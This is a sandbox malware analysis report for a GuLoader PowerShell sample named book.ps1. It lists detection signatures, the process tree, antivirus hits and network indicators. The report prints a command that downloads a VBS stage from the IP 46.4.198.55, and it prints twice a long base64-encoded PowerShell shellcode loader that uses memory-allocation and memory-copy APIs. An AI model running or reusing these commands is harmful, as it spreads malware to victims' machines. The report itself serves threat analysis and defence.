Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
book.ps1

Overview

General Information

Sample Name:book.ps1
Analysis ID:623683
MD5:10c1a6b6135d5f641ed56cfde0da1967
SHA1:dbf7d6327c2bf13f3ae772f6eaaa1c0a5fc5473e
SHA256:75de1e1b097579bf1a18c494042b16192a969dfb0fb9cdb3759d362b7b4b6a5f
Tags:Guloaderps1
Infos:

Detection

GuLoader
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 3144 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
    • wscript.exe (PID: 6948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • powershell.exe (PID: 6276 cmdline: C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAGUAbgBhAHQAZQByAGYAbwA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVABJAE8ATABPAEcAIgApAC4AQQBjAGUAdABhAG0AaQBkAHAAaAAyAA0ACgANAAoAJABVAHQAaQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAFsAXQBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBdACwAJABTAGUAbgBhAHQAZQByAGYAbwAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAUwBlAG4AYQB0AGUAcgBmAG8ALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkADQAKAAkAewANAAoAIAAgACAAIAAgACAAIAAgACQAVQB0AGkAbABbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAFMAZQBuAGEAdABlAHIAZgBvAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkADQAKACAAIAAgACAAfQANAAoADQAKAA0ACgBmAG8AcgAoACQAYwBvAG4AYwBvAG0AaQB0AGEAPQAwADsAIAAkAGMAbwBuAGMAbwBtAGkAdABhACAALQBsAHQAIAAkAFUAdABpAGwALgBjAG8AdQBuAHQAIAA7ACAAJABjAG8AbgBjAG8AbQBpAHQAYQArACsAKQANAAoAewANAAoACQANAAoAWwBIAGUAeABhAHMAdABpAGMAaAAxAF0AOgA6AFIAdABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMAKwAkAGMAbwBuAGMAbwBtAGkAdABhACwAWwByAGUAZgBdACQAVQB0AGkAbABbACQAYwBvAG4AYwBvAG0AaQB0AGEAXQAsADEAKQANAAoADQAKAH0ADQAKAFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMALAAgADAAKQANAAoADQAKAA0ACgA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • csc.exe (PID: 5752 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
          • cvtres.exe (PID: 1280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Antivirus detection for URL or domain
    Source: http://46.4.198.55Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbshAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbsAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs0yjAvira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vAvira URL Cloud: Label: malware
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

    Networking

    barindex
    Potential dropper URLs found in powershell memory
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q1
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
    Source: global trafficHTTP traffic detected: GET /10P/Sursdepa.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 46.4.198.55Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: unknownTCP traffic detected without corresponding DNS query: 46.4.198.55
    Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55
    Source: powershell.exe, 00000003.00000002.292149897.00000167E848D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.v
    Source: powershell.exe, 00000003.00000002.295924482.00000167E855C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282654233.00000167E5B98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs
    Source: powershell.exe, 00000003.00000002.282555129.00000167E5B10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs
    Source: powershell.exe, 00000003.00000002.301030775.00000167FFDE7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281332697.00000167FFDE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$
    Source: powershell.exe, 00000003.00000002.282784282.00000167E5E50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~
    Source: powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs0yj
    Source: powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbsh
    Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://46.4.198.55x
    Source: powershell.exe, 00000001.00000002.335374156.00000211CEF07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.300317707.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281232280.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.528421591.0000000002D8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000001.00000002.323271463.00000211B7732000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
    Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000001.00000002.318892077.00000211B6EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282944131.00000167E7731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000003.00000002.298249127.00000167E8C5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
    Source: powershell.exe, 00000003.00000002.300436047.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281286699.00000167FFC19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
    Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: global trafficHTTP traffic detected: GET /10P/Sursdepa.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 46.4.198.55Connection: Keep-Alive

    System Summary

    barindex
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMARABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQB